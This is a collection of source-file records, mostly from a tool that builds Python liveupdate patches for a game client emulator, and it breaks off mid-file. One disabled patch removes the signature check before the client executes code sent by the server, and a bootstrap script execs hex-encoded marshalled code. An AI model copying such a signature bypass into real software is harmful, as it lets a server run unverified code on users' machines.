"alpha_fraction": 0.6701388955116272,
"alphanum_fraction": 0.6840277910232544,
"avg_line_length": 19.571428298950195,
"blob_id": "8215b8e4b8dad26907a9553bbd2873fd5023a05e",
"content_id": "273b2cdbb892a464a26b152db2c5d5c0a46922bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 14,
"path": "/workflow/tests/test_makeBigWig.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nimport os\nimport utils\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_makeBigWig():\n assert os.path.exists(os.path.join(test_output_path, 'Q-Y5F6_1M.se.bw'))\n"
},
{
"alpha_fraction": 0.649350643157959,
"alphanum_fraction": 0.6655844449996948,
"avg_line_length": 19.53333282470703,
"blob_id": "c9be91eea2d1b7cf9b37b504530c0b5ff6f31c37",
"content_id": "07e76108fbfc92f945060d8e5d1e1ea8f74e6a4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 15,
"path": "/workflow/tests/test_fastqc.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_fastqc():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.R1_fastqc.zip'))\n"
}
] | 5 |
THUNDERGROOVE/evegen
|
https://github.com/THUNDERGROOVE/evegen
|
aba54cbb30be7428aedd4d9eb60323bf2f591193
|
64d24eb560fb8762943c01bfd00b65a2b03bcfbc
|
fbaedac5fa3e2eacd0d1c38ed89291ffce5959aa
|
refs/heads/master
| 2021-10-29T19:49:26.679989 | 2021-10-10T00:15:34 | 2021-10-10T00:15:34 | 104,972,076 | 4 | 3 |
MIT
| 2017-09-27T04:31:19 | 2021-10-09T06:43:43 | 2021-10-10T00:15:34 |
C
|
[
{
"alpha_fraction": 0.6928571462631226,
"alphanum_fraction": 0.6928571462631226,
"avg_line_length": 45.66666793823242,
"blob_id": "07fa3409833c784c7387b9d080ac8c82376c4ad6",
"content_id": "7c565b8ab88da59cde7b7ca66498bdcdf4b51439",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 6,
"path": "/patches/disabled/OnRemoteExecDisableSignCheck.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.debug::debugSvc\", \"OnRemoteExec\")\ndef OnRemoteExec(self, signedCode):\n eve.Message(\"CustomNotify\", {\"notify\": \"OnRemoteExec called\"})\n # No need to check if we're a client!\n code = marshal.loads(signedCode)\n self._Exec(code, {})\n"
},
{
"alpha_fraction": 0.5503681302070618,
"alphanum_fraction": 0.5575636029243469,
"avg_line_length": 47.97541046142578,
"blob_id": "8eb3c161008ae71928013a73a2f530eeb1c62415",
"content_id": "69bcca206e28ba1c5a64ef61ba4afb85b176f673",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5976,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 122,
"path": "/patches/EnableChatSlash.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"form.LSCChannel::Channel\", \"InputKeyUp\")\n#@patchinfo(\"InputKeyUp\", \"Allow / in chat without svc_slash\")\ndef InputKeyUp(self, *args):\n import blue\n shift = uicore.uilib.Key(uiconst.VK_SHIFT)\n if shift:\n return \n if self.waitingForReturn and blue.os.GetWallclockTime() - self.waitingForReturn < MIN:\n txt = self.input.GetValue(html=0)\n txt = txt.rstrip()\n cursorPos = -1\n self.input.SetValue(txt, cursorPos=cursorPos)\n eve.Message('uiwarning03')\n return \n NUM_SECONDS = 4\n if session.userType == 23 and (type(self.channelID) != types.IntType or self.channelID < 2100000000 and self.channelID > 0):\n lastMessageTime = long(getattr(self, 'lastMessageTime', blue.os.GetWallclockTime() - 1 * MIN))\n if blue.os.GetWallclockTime() - lastMessageTime < NUM_SECONDS * SEC:\n eve.Message('LSCTrialRestriction_SendMessage', {'sec': (NUM_SECONDS * SEC - (blue.os.GetWallclockTime() - lastMessageTime)) / SEC})\n return \n setattr(self, 'lastMessageTime', blue.os.GetWallclockTime())\n txt = self.input.GetValue(html=0)\n self.input.SetValue('')\n txt = txt.strip()\n while txt.endswith('<br>'):\n txt = txt[:-4]\n\n txt = txt.strip()\n while txt.startswith('<br>'):\n txt = txt[4:]\n\n txt = txt.strip()\n if not txt or len(txt) <= 0:\n return \n if sm.GetService('LSC').IsLanguageRestricted(self.channelID):\n try:\n if unicode(txt) != unicode(txt).encode('ascii', 'replace'):\n uicore.registry.BlockConfirm()\n eve.Message('LscLanguageRestrictionViolation')\n return \n except:\n log.LogTraceback('Gurgle?')\n sys.exc_clear()\n eve.Message('uiwarning03')\n return \n if boot.region == 'optic':\n try:\n bw = str(localization.GetByLabel('UI/Chat/ChannelWindow/OpticServerBannedWords')).decode('utf-7')\n banned = [ word for word in bw.split() if word ]\n for bword in banned:\n if txt.startswith('/') and not (txt.startswith('/emote') or txt.startswith('/me')):\n txt = txt\n else:\n txt = txt.replace(bword, '*')\n\n except Exception:\n log.LogTraceback('Borgle?')\n sys.exc_clear()\n if not sm.GetService('LSC').IsSpeaker(self.channelID):\n access = sm.GetService('LSC').GetMyAccessInfo(self.channelID)\n if access[1]:\n if access[1].reason:\n reason = access[1].reason\n else:\n reason = localization.GetByLabel('UI/Chat/NotSpecified')\n if access[1].admin:\n admin = access[1].admin\n else:\n admin = localization.GetByLabel('UI/Chat/NotSpecified')\n if access[1].untilWhen:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannelUntil', reason=reason, untilWhen=access[1].untilWhen, admin=admin)\n else:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannel', reason=reason, admin=admin)\n else:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannel', reason=localization.GetByLabel('UI/Chat/NotSpecified'), admin=localization.GetByLabel('UI/Chat/NotSpecified'))\n self._Channel__LocalEcho(borki)\n if txt != '' and txt.replace('\\r', '').replace('\\n', '').replace('<br>', '').replace(' ', '').replace('/emote', '').replace('/me', '') != '':\n if txt.startswith('/me'):\n txt = '/emote' + txt[3:]\n spoke = 0\n if self.inputs[-1] != txt:\n self.inputs.append(txt)\n self.inputIndex = None\n nobreak = uiutil.StripTags(txt.replace('<br>', ''))\n if nobreak.startswith('/') and not (nobreak.startswith('/emote') or nobreak == '/'):\n for commandLine in uiutil.StripTags(txt.replace('<br>', '\\n')).split('\\n'):\n try:\n slashRes = uicore.cmd.Execute(commandLine)\n if slashRes is not None:\n sm.GetService('logger').AddText('slash result: %s' % slashRes, 'slash')\n elif nobreak.startswith('/tutorial') and eve.session and eve.session.role & service.ROLE_GML:\n sm.GetService('tutorial').SlashCmd(commandLine)\n elif eve.session and eve.session.role & ROLE_SLASH:\n if commandLine.lower().startswith('/mark'):\n sm.StartService('logger').LogError('SLASHMARKER: ', (eve.session.userid, eve.session.charid), ': ', commandLine)\n slashRes = sm.RemoteSvc('slash').SlashCmd(commandLine)\n if slashRes is not None:\n sm.GetService('logger').AddText('slash result: %s' % slashRes, 'slash')\n self._Channel__LocalEcho('/slash: ' + commandLine)\n except:\n self._Channel__LocalEcho('/slash failed: ' + commandLine)\n raise \n\n else:\n stext = uiutil.StripTags(txt, ignoredTags=['b',\n 'i',\n 'u',\n 'url',\n 'br'])\n try:\n if type(self.channelID) != types.IntType and self.channelID[0][0] in ('constellationid', 'regionid') and util.IsWormholeSystem(eve.session.solarsystemid2):\n self._Channel__Output(localization.GetByLabel('UI/Chat/NoChannelAccessWormhole'), 1, 1)\n return \n self.waitingForReturn = blue.os.GetWallclockTime()\n self._Channel__LocalEcho(stext)\n if not IsSpam(stext):\n sm.GetService('LSC').SendMessage(self.channelID, stext)\n else:\n self.waitingForReturn = 0\n except:\n self.waitingForReturn = 0\n raise \n"
},
{
"alpha_fraction": 0.5522703528404236,
"alphanum_fraction": 0.5659978985786438,
"avg_line_length": 27.696969985961914,
"blob_id": "33543b6b8f6d8ebddfa63b53e9cdfa4634970989",
"content_id": "475ef77409f85186f904ac76bee1441e0526c43b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1894,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 66,
"path": "/src/db.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"db.h\"\n\n#include \"patch.h\"\n\n//#include <my_global.h>\n#include <mysql.h>\n\nMYSQL *con = NULL;\n\nbool DBInit(const char *username, const char *password, const char *db) {\n con = mysql_init(NULL);\n if (con == NULL) {\n printf(\" ERROR | Unable to do preliminary mysql connection\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n if (mysql_real_connect(con, \"localhost\", username, password,\n NULL, 0, NULL, 0) == NULL) {\n printf(\" ERROR | Unable to connect to mysql server\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n if (mysql_select_db(con, db)) {\n printf(\" ERROR | Unable to select database '%s'\\n\", db);\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n return true;\n}\n\nconst char *insert_statement = R\"(\nINSERT liveupdates SET\nupdateID=%d, updateName='%s', description='%s',\nmachoVersionMin=%d, machoVersionMax=%d,\nbuildNumberMin=%d, buildNumberMax=%d,\nmethodName='%s', objectID='%s', codeType='%s', code='%s';\n)\";\n\nbool DBCleanLiveupdates() {\n if (mysql_query(con, \"TRUNCATE TABLE liveupdates;\")) {\n printf(\" ERROR | Unable to truncate liveupdates\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n return true;\n}\n\nbool DBApplyPatch(Patch *p, int id) {\n char buffer[10000];\n char *codebuf = (char *)calloc((p->bytecode_size * 2) + 1, 1);\n mysql_real_escape_string(con, codebuf, p->bytecode, p->bytecode_size);\n snprintf(buffer, 10000, insert_statement,\n id, p->name, \"Generated by evegen\",\n 1, 330,\n 1, 500000,\n p->method_name, p->class_name, p->type, codebuf\n );\n if (mysql_query(con, buffer)) {\n printf(\" ERROR | %s\\n\", mysql_error(con));\n return false;\n }\n return true;\n}\n"
},
{
"alpha_fraction": 0.6880000233650208,
"alphanum_fraction": 0.6909090876579285,
"avg_line_length": 34.230770111083984,
"blob_id": "7d1305f65204ea14b2f15d9e4c043207ed06d56f",
"content_id": "1498c3d9cd10430a19affc7d2d90bdfb3616e48a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1375,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 39,
"path": "/devtools.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "def Bootstrap(a, b):\n import marshal\n import imp\n import sys\n import svc\n import service\n import types\n import form\n import nasty\n\n\n\n insiderClass = 'hexex::insider.py' #This will get replaced with the actual hex encoded code\n code = marshal.loads(insiderClass.decode('hex'))\n insider = imp.new_module('insider')\n exec code in insider.__dict__, None\n setattr(svc, 'insider', insider.insider)\n sm.StopService('insider')\n sm.StartService('insider')\n\n devWindowClass = 'hexex::devToolsWindow.py'\n devConsoleClass = 'hexex::devToolsConsole.py'\n\n code2 = marshal.loads(devWindowClass.decode('hex'))\n DevWindow = imp.new_module(\"DevWindow\")\n exec code2 in DevWindow.__dict__, None\n #setattr(form, \"DevWindow\", DevWindow.DevWindow)\n nasty.nasty.RegisterNamedObject(DevWindow.DevWindow, \"form\", \"DevWindow\", \"devtools.py\", globals())\n\n code3 = marshal.loads(devConsoleClass.decode('hex'))\n ConsoleWindow = imp.new_module(\"ConsoleWindow\")\n exec code3 in ConsoleWindow.__dict__, None\n nasty.nasty.RegisterNamedObject(ConsoleWindow.ConsoleWindow, \"form\", \"ConsoleWindow\", \"devtools.py\", globals())\n\n script = 'def evemuLoad():\\n\\tsm.StartService(\"insider\")'\n code = compile(script, '<script>', 'exec')\n data = marshal.dumps(code)\n exec marshal.loads(data) in None, None\n a.Loader = evemuLoad\n\n"
},
{
"alpha_fraction": 0.7411167621612549,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 18.700000762939453,
"blob_id": "d802978162c08cf3cf009c0e7da79c9a09c02ee3",
"content_id": "9e29d5046e98a485ac0ad28912072fc077b0d3bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 10,
"path": "/src/devtools.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __DEVTOOLS_H__\n#define __DEVTOOLS_H__\n\n#include <Python.h>\n#include <marshal.h>\n\nbool MakeDevtools(const char *devtools_file);\nbool MakeDevtoolsNoScript(const char *devtools_file);\n\n#endif\n"
},
{
"alpha_fraction": 0.5218217968940735,
"alphanum_fraction": 0.529513418674469,
"avg_line_length": 29.53034210205078,
"blob_id": "6b32dce766462f5edb54ba209cf1d253aa0e28b3",
"content_id": "a77b178ad141547e965f0a318410483923615c7c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11571,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 379,
"path": "/src/patch.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"patch.h\"\n\n#include <marshal.h>\n#include <dirent.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <ctype.h>\n\n#include <string>\n#include <sstream>\n#include <vector>\n#include <iterator>\n\n#define STB_C_LEXER_IMPLEMENTATION\n#include \"stb_c_lexer.h\"\n\n// Small template for assiting string spliting\ntemplate<typename out>\nvoid split(const std::string &s, char delim, out result) {\n std::stringstream ss;\n ss.str(s);\n std::string item;\n while (std::getline(ss, item, delim)) {\n *(result++) = item;\n }\n}\n\nstd::vector<std::string> split(const std::string &s, char delim) {\n std::vector<std::string> elems;\n split(s, delim, std::back_inserter(elems));\n return elems;\n}\n\n// This parses the liveupdate deco after the liveupdate decorator\nstatic bool ParseLiveupdate(stb_lexer *lex, Patch *p) {\n stb_c_lexer_get_token(lex);\n if (lex->token != '(') {\n printf(\" ERROR | Expected '(' in liveupdate but got something else\\n\");;\n return false;\n }\n\n std::vector<std::string> args;\n while (true) {\n stb_c_lexer_get_token(lex);\n if (lex->token == CLEX_dqstring) {\n args.push_back(std::string(lex->string));\n }\n if (lex->token == ',') {\n continue;\n }\n if (lex->token == ')') {\n break;\n }\n }\n\n p->type = strdup(args[0].c_str());\n p->class_name = strdup(args[1].c_str());\n p->method_name = strdup(args[2].c_str());\n return true;\n}\n\n// This parses the patchinfo decorator after the patchinfo identifier\nstatic bool ParseInfo(stb_lexer *lex, Patch *p) {\n stb_c_lexer_get_token(lex);\n if (lex->token != '(') {\n printf(\" ERROR | Expected '(' in patchinfo but got something else\\n\");\n return false;\n }\n std::vector<std::string> args;\n while (true) {\n stb_c_lexer_get_token(lex);\n if (lex->token == CLEX_dqstring) {\n args.push_back(std::string(lex->string));\n }\n if (lex->token == ',') {\n continue;\n }\n if (lex->token == ')') {\n break;\n }\n }\n p->func_name = strdup(args[0].c_str());\n p->desc = strdup(args[1].c_str());\n return true;\n}\n\n// CreatePatch returns a Patch pointer given a filename to the patch file\nPatch *CreatePatch(const char *filename) {\n Patch *p = (Patch *)calloc(1, sizeof(Patch));\n stb_lexer lex;\n\n FILE *f = fopen(filename, \"r\");\n fseek(f, 0, SEEK_END);\n size_t size = ftell(f);\n rewind(f);\n\n char *data = (char *)calloc(size + 1, 1);\n size_t rsize = fread(data, 1, size, f);\n if (rsize != size) {\n printf(\" WARN | File read smaller than file size???\\n\");\n }\n\n p->data = data;\n p->name = strdup(filename);\n\n std::string patch(data);\n std::vector<std::string> lines = split(data, '\\n');\n std::vector<std::string> decos;\n\n for (uint32_t i = 0; i < lines.size(); i++) {\n std::string line = lines[i];\n if (line.size() > 1) {\n if (line[0] == '#' &&\n line[1] == '@') {\n decos.push_back(std::string(&line.c_str()[1]));\n }\n }\n }\n\n if (decos.size() < 2) {\n printf(\" ERROR | Patches must contain at least two comment decos\\n\");\n return NULL;\n }\n\n bool liveupdate_ok = false;\n bool patchinfo_ok = false;\n\n for (uint32_t i = 0; i < decos.size(); i++) {\n std::string deco = decos[i];\n\n stb_c_lexer_init(&lex, deco.c_str(), deco.c_str() + deco.size(),\n (char *)malloc(0x10000), 0x10000);\n stb_c_lexer_get_token(&lex);\n\n if (lex.token != '@') {\n printf(\" ERROR | Expected '@' but got something else\\n\");\n return NULL;\n }\n\n stb_c_lexer_get_token(&lex);\n\n if (lex.token != CLEX_id) {\n printf(\" ERROR | Unexpected token\\n\");\n return NULL;\n }\n\n if (strcmp(lex.string, \"liveupdate\") == 0) {\n if (liveupdate_ok) {\n printf(\" WARN | Two liveupdate decos in %s\\n\", p->name);\n } else {\n liveupdate_ok = ParseLiveupdate(&lex, p);\n }\n } else if (strcmp(lex.string, \"patchinfo\") == 0) {\n if (patchinfo_ok) {\n printf(\" WARN | Two patchinfo decos in %s\\n\", p->name);\n } else {\n patchinfo_ok = ParseInfo(&lex, p);\n }\n } else {\n printf(\" ERROR | Unknown deco type '%s'\\n\", lex.string);\n }\n }\n\n if (liveupdate_ok == false ||\n patchinfo_ok == false) {\n printf(\" ERROR | Didn't get a valid liveupdate or patchinfo deco\\n\");\n printf(\" liveupdate:%d patchinfo:%d\\n\", liveupdate_ok, patchinfo_ok);\n return NULL;\n }\n\n\n return p;\n}\n\n// PreProceessPatch does the bytecode compilation for the given patch\nbool PreProcessPatch(Patch *p) {\n PyErr_Clear();\n PyObject *code = PyImport_AddModule(\"__main__\");\n int ret = PyRun_SimpleString(p->data);\n if (ret != 0) {\n printf(\" ERROR | Some kind of error while parsing the patch\\n\");\n return false;\n }\n if (code == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Failed to compile patch\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n\n PyObject *func = PyObject_GetAttrString(code, p->func_name);\n if (func == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Unable to get function object from compiled code\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n PyObject *bytecode = PyObject_GetAttrString(func, \"func_code\");\n if (bytecode == NULL) {\n PyObject *type, *value, *traceback;\n PyErr_Fetch(&type, &value, &traceback);\n printf(\" ERROR | Object didn't return an object with func_code\\n\");\n printf(\" | %s\\n\", PyString_AsString(value));\n return false;\n }\n\n PyObject *bytecode_str = PyMarshal_WriteObjectToString(bytecode,\n Py_MARSHAL_VERSION);\n\n PyString_AsStringAndSize(bytecode_str, &p->bytecode, (Py_ssize_t *)&p->bytecode_size);\n\n return true;\n}\n\n// LoadPatches returns a list of valid patches given a directory\nstd::vector<Patch *> LoadPatches(const char *patch_dir) {\n DIR *dir = opendir(patch_dir);\n dirent *pent = NULL;\n std::vector<Patch *> patches;\n\n while ((pent = readdir(dir))) {\n if (pent->d_name[0] == '.') {\n continue;\n }\n\n char *filename = (char *)calloc(256, 1);\n strcpy(filename, patch_dir);\n strcat(filename, \"/\");\n strcat(filename, pent->d_name);\n\n if (pent->d_type == DT_REG) {\n Patch *p = CreatePatch(filename);\n if (p != NULL) {\n if (PreProcessPatch(p)) {\n patches.push_back(p);\n }\n }\n }\n }\n return patches;\n}\n\n#pragma GCC diagnostic push\n#pragma GCC diagnostic ignored \"-Wunused-result\"\n\nconst char *PatchErrorString(PatchError pe) {\n PatchError_ p = pe.err;\n switch (p) {\n case patch_ok: {\n return \"OK\";\n } break;\n case patch_invalid_magic: {\n return \"Invalid magic in raw liveupdate file\";\n } break;\n case patch_file_too_small: {\n return \"Patch file too small. We wanted to read more than existed\";\n } break;\n case patch_file_error: {\n return \"Generic file error while writing\";\n } break;\n case __patch_null: {\n } // fallthrough\n default: {\n return \"<PROGRAMMER ERROR>\";\n }\n }\n return NULL;\n}\n\n#define strlen_write_size(dest) { \\\n dest ## _size = strlen(dest); \\\n }\n\n#define fwrite_string_check(dest) { \\\n if(fwrite(dest, sizeof(char), dest ## _size, f) \\\n < dest ## _size) { \\\n MAKE_PATCH_ERROR(patch_file_error); \\\n } \\\n }\n\n\n#define fread_string_check(dest) { \\\n uint32_t s = fread(dest, sizeof(char), dest ## _size, f); \\\n if (s < dest ## _size) { \\\n printf(\"%u < %u\\n\", s, dest ## _size); \\\n MAKE_PATCH_ERROR(patch_file_too_small); \\\n } \\\n } \\\n\nPatchError LoadRawPatchFile(PatchFile *pf, const char *filename) {\n FILE *f = fopen(filename, \"rb\");\n if (fread(pf->magic, sizeof(char), 4, f) < 4) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n if (strncmp(pf->magic, LIVEUPDATEMAGIC, 4) != 0) {\n MAKE_PATCH_ERROR(patch_invalid_magic);\n }\n \n size_t count_read = fread(&pf->patch_count, 1, sizeof(uint32_t), f);\n if (count_read < sizeof(uint32_t)) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n pf->patches = (Patch *)calloc(sizeof(Patch), pf->patch_count);\n\n for (uint32_t i = 0; i < pf->patch_count; i++) {\n Patch *p = &pf->patches[i];\n if (fread(p, sizeof(uint32_t), 7, f) < 7) {\n MAKE_PATCH_ERROR(patch_file_too_small);\n }\n\n p->class_name = (char *)calloc(1, p->class_name_size + 1);\n p->func_name = (char *)calloc(1, p->func_name_size + 1);\n p->method_name = (char *)calloc(1, p->method_name_size + 1);\n p->type = (char *)calloc(1, p->type_size + 1);\n p->name = (char *)calloc(1, p->name_size + 1);\n p->desc = (char *)calloc(1, p->desc_size + 1);\n p->bytecode = (char *)calloc(1, p->bytecode_size + 1);\n\n fread_string_check(p->class_name);\n fread_string_check(p->method_name);\n fread_string_check(p->func_name);\n fread_string_check(p->type);\n fread_string_check(p->name);\n fread_string_check(p->desc);\n fread_string_check(p->bytecode);\n }\n fclose(f);\n\n MAKE_PATCH_ERROR(patch_ok);\n}\n\nPatchError DumpRawPatchFile(std::vector<Patch *> patches, const char *filename) {\n FILE *f = fopen(filename, \"wb\");\n if (f == NULL) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n uint32_t c = patches.size();\n\n if (fwrite(LIVEUPDATEMAGIC, 1, strlen(LIVEUPDATEMAGIC), f) < strlen(LIVEUPDATEMAGIC)) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n if (fwrite(&c, 1, sizeof(uint32_t), f) < sizeof(uint32_t)) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n\n for (uint32_t i = 0; i < c; i++) {\n Patch *p = patches[i];\n\n strlen_write_size(p->class_name);\n strlen_write_size(p->method_name);\n strlen_write_size(p->func_name);\n strlen_write_size(p->type);\n strlen_write_size(p->name);\n strlen_write_size(p->desc);\n\n // Write the first 7 entries containing the sizes of all of the strings\n if (fwrite(p, sizeof(uint32_t), 7, f) < 7) {\n MAKE_PATCH_ERROR(patch_file_error);\n }\n fwrite_string_check(p->class_name);\n fwrite_string_check(p->method_name);\n fwrite_string_check(p->func_name);\n fwrite_string_check(p->type);\n fwrite_string_check(p->name);\n fwrite_string_check(p->desc);\n fwrite_string_check(p->bytecode);\n }\n\n MAKE_PATCH_ERROR(patch_ok);\n}\n#pragma GCC diagnostic pop\n"
},
{
"alpha_fraction": 0.704023003578186,
"alphanum_fraction": 0.704023003578186,
"avg_line_length": 62.272727966308594,
"blob_id": "de8ed418640fb506b8fd1ad071fee40f86ae4314",
"content_id": "2b4d9b035239cb5e5060d2bcade72c6e4fd86d98",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 11,
"path": "/patches/disabled/EnableDebugSvc.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# WindowMgr.GetWindowColors seemed like a good entry point?\n#@liveupdate(\"globalClassMethod\", \"svc.window::WindowMgr\", \"GetWindowColors\")\ndef GetWindowColors(self):\n if getattr(self, \"__debugPatched__\", None) == None:\n sm.StartService(\"debug\") # maybe something can be hacked together with sm.GetService(\"debugSvc\")._ExecConsole()\n setattr(self, \"__debugPatched__\", True)\n return (settings.user.windows.Get(\"wndColor\", eve.themeColor),\n settings.user.windows.Get(\"wndBackgroundcolor\", eve.themeBgColor),\n settings.user.windows.Get(\"wndComponent\", eve.themeCompColor),\n settings.user.windows.Get(\"wndComponentsub\", eve.themeCompSubColor)\n )\n"
},
{
"alpha_fraction": 0.6051517128944397,
"alphanum_fraction": 0.6087006330490112,
"avg_line_length": 58.828765869140625,
"blob_id": "5cd5c318b9c171e08af397f5b9a3103d3d89d172",
"content_id": "7b246ccaaf8163a090f53ed8dc4de79ed1c199d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8735,
"license_type": "permissive",
"max_line_length": 176,
"num_lines": 146,
"path": "/patches/FixGMMenu.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.menu::MenuSvc\", \"GetGMMenu\")\n#@patchinfo(\"GetGMMenu\", \"Various fixes to the right click GM menu\")\ndef GetGMMenu(self, itemID = None, slimItem = None, charID = None, invItem = None, mapItem = None):\n\n def startConsole():\n import form\n import triui\n import code\n import uthread\n m = form.MessageBox.Open()\n m.Execute(\"a\", \"Notice\", triui.OK, triui.INFO, \"don't look at me\")\n m.SetText(\"You must start exefile.exe with /console for this to do anything\")\n uthread.new(code.interact, ())\n\n if not session.role & (service.ROLE_GML | service.ROLE_WORLDMOD):\n if charID and session.role & service.ROLE_LEGIONEER:\n return [('Gag ISK Spammer', self.GagIskSpammer, (charID,))]\n return []\n gm = [(str(itemID or charID), blue.pyos.SetClipboardData, (str(itemID or charID),))]\n gm.append((\"Open Dev Window\", form.DevWindow.Open, ()))\n gm.append((\"Open Console (don't do it)\", startConsole, ()))\n if mapItem and not slimItem:\n gm.append(('TR me here!', sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(mapItem.itemID),)))\n #eve.Message(\"CustomNotify\", {\"notify\": \"Teleporting to: \" + str(mapItem.itemID)})\n gm.append(None)\n elif charID:\n gm.append(('TR me to %s' % cfg.eveowners.Get(charID).name, sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(charID),)))\n gm.append(None)\n elif slimItem:\n gm.append(('TR me here!', sm.RemoteSvc('slash').SlashCmd, ('/tr me ' + str(itemID),)))\n gm.append(None)\n if invItem:\n typeID = invItem.typeID\n gm += [('Copy ID/Qty', self.CopyItemIDAndMaybeQuantityToClipboard, (invItem,))]\n typeText = 'copy typeID (%s)' % invItem.typeID\n gm += [(typeText, blue.pyos.SetClipboardData, (str(invItem.typeID),))]\n if invItem.flagID == const.flagHangar and invItem.locationID == session.stationid and invItem.itemID not in (session.shipid, session.charid):\n gm.append(('Take out trash', self.TakeOutTrash, [[invItem]]))\n #gm.append(('Edit', self.GetAdamEditType, [invItem.typeID]))\n #gm.append(None)\n if typeID < 140000000:\n typeID = invItem.typeID\n gm.append(('typeID: ' + str(typeID) + ' (%s)' % cfg.invtypes.Get(typeID).name, blue.pyos.SetClipboardData, (str(typeID),)))\n invType = cfg.invtypes.Get(typeID)\n group = invType.groupID\n gm.append(('groupID: ' + str(group) + ' (%s)' % invType.Group().name, blue.pyos.SetClipboardData, (str(group),)))\n category = invType.categoryID\n categoryName = cfg.invcategories.Get(category).name\n gm.append(('categID: ' + str(category) + ' (%s)' % categoryName, blue.pyos.SetClipboardData, (str(category),)))\n graphic = invType.Graphic()\n if graphic:\n gm.append(('graphicID: ' + str(graphic.id), blue.pyos.SetClipboardData, (str(graphic.id),)))\n gm.append(('graphicFile: ' + str(graphic.graphicFile), blue.pyos.SetClipboardData, (str(graphic.graphicFile),)))\n if charID and not util.IsNPC(charID):\n action = 'gm/character.py?action=Character&characterID=' + str(charID)\n #gm.append(('Show in ESP', self.GetFromESP, (action,)))\n gm.append(None)\n gm.append(('Gag ISK Spammer', self.GagIskSpammer, (charID,)))\n gm.append(('Ban ISK Spammer', self.BanIskSpammer, (charID,)))\n #action = 'gm/users.py?action=BanUserByCharacterID&characterID=' + str(charID)\n #gm.append(('Ban User (ESP)', self.GetFromESP, (action,)))\n gm += [('Gag User', [('30 minutes', self.GagPopup, (charID, 30)),\n ('1 hour', self.GagPopup, (charID, 60)),\n ('6 hours', self.GagPopup, (charID, 360)),\n ('24 hours', self.GagPopup, (charID, 1440)),\n None,\n ('Ungag', lambda *x: self.SlashCmd('/ungag %s' % charID))])]\n gm.append(None)\n item = slimItem or invItem\n if item:\n if item.categoryID == const.categoryShip and (item.singleton or not session.stationid):\n #import dna\n #if item.ownerID in [session.corpid, session.charid] or session.role & service.ROLE_WORLDMOD:\n # 